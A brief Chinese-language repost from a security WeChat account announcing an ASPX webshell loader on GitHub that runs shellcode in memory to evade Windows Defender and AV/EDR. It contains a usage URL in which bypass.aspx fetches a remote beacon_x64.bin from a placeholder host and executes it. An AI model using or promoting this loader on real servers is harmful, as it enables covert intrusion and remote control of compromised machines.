朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全“设为星标”,否则可能就看不到了啦!
工具介绍
-
ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
-
这只是个代码例子,目的是为了学习
-
部分杀软(AV/EDR)可能需要你的Bin能够做到内存免杀
-
持续更新中,包括后续的JSP内存加载
http:
/
/URLA/bypass
.aspx?shellcodeURL=
http:
/
/URLB/beacon
_x64.bin
https://github.com/INotGreen/Webshell-loader
原文始发于微信公众号(夜组安全):ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论